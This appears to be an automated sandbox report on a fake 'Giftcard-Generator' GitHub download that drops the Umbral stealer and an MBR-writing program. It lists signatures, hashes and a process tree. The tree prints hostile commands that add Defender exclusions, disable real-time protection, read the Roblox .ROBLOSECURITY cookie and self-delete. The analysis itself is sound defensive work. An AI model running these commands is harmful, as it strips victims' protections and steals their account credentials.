Analysis

  • max time kernel
    31s
  • max time network
    33s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    09-05-2024 14:58

Errors

Reason
Machine shutdown

General

  • Target

    https://github.com/Cyendd/Giftcard-Generator/archive/refs/heads/main.zip

Malware Config

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine the installed video card.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Cyendd/Giftcard-Generator/archive/refs/heads/main.zip
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2952
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8797646f8,0x7ff879764708,0x7ff879764718
      2⤵
        PID:2988
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
        2⤵
          PID:2176
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1428
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
          2⤵
            PID:1084
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
            2⤵
              PID:1524
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
              2⤵
                PID:1916
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5416 /prefetch:8
                2⤵
                  PID:1424
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5416 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4816
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5060 /prefetch:8
                  2⤵
                    PID:3888
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
                    2⤵
                      PID:3300
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4900
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1
                      2⤵
                        PID:5812
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
                        2⤵
                          PID:5820
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1
                          2⤵
                            PID:5704
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
                            2⤵
                              PID:5708
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,11741907227689699709,12321082529542929557,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1
                              2⤵
                                PID:732
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:2688
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:4652
                                • C:\Windows\System32\rundll32.exe
                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                  1⤵
                                    PID:1720
                                  • C:\Users\Admin\Downloads\Giftcard-Generator-main\Giftcard-Generator-main\loader.exe
                                    "C:\Users\Admin\Downloads\Giftcard-Generator-main\Giftcard-Generator-main\loader.exe"
                                    1⤵
                                      PID:5296
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bootstrap.exe
                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bootstrap.exe"
                                        2⤵
                                        • Drops file in Drivers directory
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5440
                                        • C:\Windows\System32\Wbem\wmic.exe
                                          "wmic.exe" csproduct get uuid
                                          3⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5536
                                        • C:\Windows\SYSTEM32\attrib.exe
                                          "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bootstrap.exe"
                                          3⤵
                                          • Views/modifies file attributes
                                          PID:5612
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\bootstrap.exe'
                                          3⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5660
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                          3⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5968
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          3⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4512
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          3⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5384
                                        • C:\Windows\System32\Wbem\wmic.exe
                                          "wmic.exe" os get Caption
                                          3⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5740
                                        • C:\Windows\System32\Wbem\wmic.exe
                                          "wmic.exe" computersystem get totalphysicalmemory
                                          3⤵
                                            PID:5720
                                          • C:\Windows\System32\Wbem\wmic.exe
                                            "wmic.exe" csproduct get uuid
                                            3⤵
                                              PID:6096
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                              3⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:6024
                                            • C:\Windows\System32\Wbem\wmic.exe
                                              "wmic" path win32_VideoController get name
                                              3⤵
                                              • Detects videocard installed
                                              PID:5264
                                            • C:\Windows\SYSTEM32\cmd.exe
                                              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bootstrap.exe" && pause
                                              3⤵
                                                PID:3024
                                                • C:\Windows\system32\PING.EXE
                                                  ping localhost
                                                  4⤵
                                                  • Runs ping.exe
                                                  PID:5572
                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\menu.exe
                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\menu.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Writes to the Master Boot Record (MBR)
                                              PID:5560
                                              • C:\Windows\SysWOW64\shutdown.exe
                                                shutdown.exe -r -f -t 0
                                                3⤵
                                                  PID:5420
                                                • C:\Windows\SysWOW64\shutdown.exe
                                                  C:\Windows\System32\shutdown.exe -r -f -t 0
                                                  3⤵
                                                    PID:5456
                                              • C:\Windows\system32\LogonUI.exe
                                                "LogonUI.exe" /flags:0x4 /state0:0xa3901055 /state1:0x41c64e6d
                                                1⤵
                                                • Modifies data under HKEY_USERS
                                                • Suspicious use of SetWindowsHookEx
                                                PID:5744
                                              • C:\Windows\System32\rundll32.exe
                                                C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
                                                1⤵
                                                  PID:5912

                                                Network

                                                MITRE ATT&CK Enterprise v15

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  d85ba6ff808d9e5444a4b369f5bc2730

                                                  SHA1

                                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                                  SHA256

                                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                  SHA512

                                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                  Filesize

                                                  152B

                                                  MD5

                                                  2daa93382bba07cbc40af372d30ec576

                                                  SHA1

                                                  c5e709dc3e2e4df2ff841fbde3e30170e7428a94

                                                  SHA256

                                                  1826d2a57b1938c148bf212a47d947ed1bfb26cfc55868931f843ee438117f30

                                                  SHA512

                                                  65635cb59c81548a9ef8fdb0942331e7f3cd0c30ce1d4dba48aed72dbb27b06511a55d2aeaadfadbbb4b7cb4b2e2772bbabba9603b3f7d9c8b9e4a7fbf3d6b6b

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                  Filesize

                                                  152B

                                                  MD5

                                                  ecdc2754d7d2ae862272153aa9b9ca6e

                                                  SHA1

                                                  c19bed1c6e1c998b9fa93298639ad7961339147d

                                                  SHA256

                                                  a13d791473f836edcab0e93451ce7b7182efbbc54261b2b5644d319e047a00a7

                                                  SHA512

                                                  cd4fb81317d540f8b15f1495a381bb6f0f129b8923a7c06e4b5cf777d2625c30304aee6cc68aa20479e08d84e5030b43fbe93e479602400334dfdd7297f702f2

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                  Filesize

                                                  5KB

                                                  MD5

                                                  ce4e1a1361515516a644509c7ee57966

                                                  SHA1

                                                  2f2ac41792b1ddf1ea8a9309317801a05b4e9b6e

                                                  SHA256

                                                  ccf080a4fa27723ddce6a97172b86797e7549fa0fa4327afa92178d45bcac542

                                                  SHA512

                                                  11f5d3f1eabe34821f05b9114eff10560cd4dbf05723a3321b983f76af49d2f1c0b35bd04a0582a837c6ec3261f4a7f7ddd75f711aedd13d650ab39fd26a6b30

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                  Filesize

                                                  6KB

                                                  MD5

                                                  b8f697a388ebfe8b3b80d75a72dd722b

                                                  SHA1

                                                  d856e9839cbfdb46fdd7904359d1da2fd205337d

                                                  SHA256

                                                  b7e7efd599869ea7fa9bbd499f9f100e3a48f6c31ed3d6b6fd209661cef63e73

                                                  SHA512

                                                  6131bd9374aa3f3763c2144171ed06464cedd470a484e80d3a24c89885e1b969302b313e15652cd3e4ee39ffaf796e75ce56a8270472067ac1e31247ef3c170a

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                  Filesize

                                                  16B

                                                  MD5

                                                  6752a1d65b201c13b62ea44016eb221f

                                                  SHA1

                                                  58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                  SHA256

                                                  0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                  SHA512

                                                  9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                  Filesize

                                                  11KB

                                                  MD5

                                                  a7c4f3799b7fde4556b9c554a26110b1

                                                  SHA1

                                                  0ea82b615601f5998f55d830ee2b15fdebefba99

                                                  SHA256

                                                  26fc3f2273e28b93916e8a1d4f448a5c9fc7005c6dc7a14907e1fb543926fb1a

                                                  SHA512

                                                  1abca9d5763afcaaa2d693d93e025b69a2e0d623bae5f975c40e40fe30f399ad41025b45138627640cbff06ee9dbe5d7d23d42dd174e4f48b6d41f366abd5ed1

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                  Filesize

                                                  11KB

                                                  MD5

                                                  3d933cce3dd61ebe6598bb882da3af8d

                                                  SHA1

                                                  c98d1d02fba00d7c96a7ed1877406bf68d55d27e

                                                  SHA256

                                                  9601078b901c5a25863fc57ce2e69465576f14727fb7cc35d54240ba135e79b0

                                                  SHA512

                                                  8b50e9c51f7a6fd6319b3dffd99ac46125637e1b88aed6207ac402ef532325715753202c9d5f84ce92a4d5b17f2b61ee93b2df9c27a43097fa7591cdabbbfc88

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  6d42b6da621e8df5674e26b799c8e2aa

                                                  SHA1

                                                  ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                  SHA256

                                                  5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                  SHA512

                                                  53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  948B

                                                  MD5

                                                  c65738617888921a153bd9b1ef516ee7

                                                  SHA1

                                                  5245e71ea3c181d76320c857b639272ac9e079b1

                                                  SHA256

                                                  4640ba4001fd16a593315299cbdd4988dc2c7075820687f1018aac40aca95c26

                                                  SHA512

                                                  2e2a0ebd93f9d8dd07a7599054bce232683e9add9a35e77b584618040bcfd84a42545352519ec4736cc379002210b6f3ed2d905591c6925c0981b0392b495bfa

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  276798eeb29a49dc6e199768bc9c2e71

                                                  SHA1

                                                  5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

                                                  SHA256

                                                  cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

                                                  SHA512

                                                  0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  ca58d1913d3261f116a299095e04f734

                                                  SHA1

                                                  941d13d0c8c65adb6513f23991acfa0d62facdea

                                                  SHA256

                                                  755daf72f2f5e983abb009c3b1eef4c7c660999f5ff581545bbcae7088c17c69

                                                  SHA512

                                                  87b0d8c9a5348235e9ad6416e09665764db1af408bf763857dc40e39411fa0cf405e3e8b9f0b8540c72aa874059d1dee865aa0cff8dba0fde5779ec9480b5e40

                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bootstrap.exe

                                                  Filesize

                                                  229KB

                                                  MD5

                                                  2f7917208470cb60a461821bd3bd7b38

                                                  SHA1

                                                  60439ca8b3355d217a1ece1f059adfdc893a15a4

                                                  SHA256

                                                  bcd85c22f2dc22bfaca369c126912de4ddae0be03bdf69d6ed7bcbc51668a191

                                                  SHA512

                                                  2f961f422cc7f66326708e832031ffaf2c4efea2ca1f5129e7d07bf056faf3d11046a161c36f69dbd3043d6f353a9e0cc943a94fed9fcd73e5bc64855d94d699

                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\menu.exe

                                                  Filesize

                                                  71KB

                                                  MD5

                                                  bfe57939db2d2e05f2c01d9810c414cd

                                                  SHA1

                                                  502fbf4cdb80eccee2798efa7bf81d2fe6b21420

                                                  SHA256

                                                  2a9e09c96ab0dbf75f4c1277295ca5e16345698415b35da414d9954ddaa8de98

                                                  SHA512

                                                  6b9cf57859162d92ee0b7b26d613e935b194047f26e8e7ebd1cbab452014e90a30e5a14004ad385713c536f9b8b72f95f8e9d8b848d4522c4693ed7f8ee8e13b

                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a01e4xrl.twn.ps1

                                                  Filesize

                                                  60B

                                                  MD5

                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                  SHA1

                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                  SHA256

                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                  SHA512

                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                • C:\Users\Admin\Downloads\Giftcard-Generator-main.zip

                                                  Filesize

                                                  283KB

                                                  MD5

                                                  6e614f123bf3c9ef51aec7e517387008

                                                  SHA1

                                                  caef2512f74331cf59860e8059d58fb57222269c

                                                  SHA256

                                                  64b42c91eefced7635415b0a29cf7edbef38861faaf8050238fcbe802ef731a3

                                                  SHA512

                                                  4f7e581e9a1962a8f349c469c4e1fd209c22fa4c9184ac9dc0ab6a81476be8ddb47928cbba1a7c75c93826cfc07707563c17e65c5eadc37892740ed3cc529e4c

                                                • C:\Windows\system32\drivers\etc\hosts

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  4028457913f9d08b06137643fe3e01bc

                                                  SHA1

                                                  a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

                                                  SHA256

                                                  289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

                                                  SHA512

                                                  c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

                                                • memory/5440-124-0x0000023EFFF50000-0x0000023EFFF6E000-memory.dmp

                                                  Filesize

                                                  120KB

                                                • memory/5440-122-0x0000023F00080000-0x0000023F000D0000-memory.dmp

                                                  Filesize

                                                  320KB

                                                • memory/5440-121-0x0000023F00000000-0x0000023F00076000-memory.dmp

                                                  Filesize

                                                  472KB

                                                • memory/5440-160-0x0000023EE7710000-0x0000023EE771A000-memory.dmp

                                                  Filesize

                                                  40KB

                                                • memory/5440-161-0x0000023EFFF90000-0x0000023EFFFA2000-memory.dmp

                                                  Filesize

                                                  72KB

                                                • memory/5440-91-0x0000023EE5A30000-0x0000023EE5A70000-memory.dmp

                                                  Filesize

                                                  256KB

                                                • memory/5560-190-0x0000000000400000-0x000000000043F000-memory.dmp

                                                  Filesize

                                                  252KB

                                                • memory/5660-97-0x00000248B2680000-0x00000248B26A2000-memory.dmp

                                                  Filesize

                                                  136KB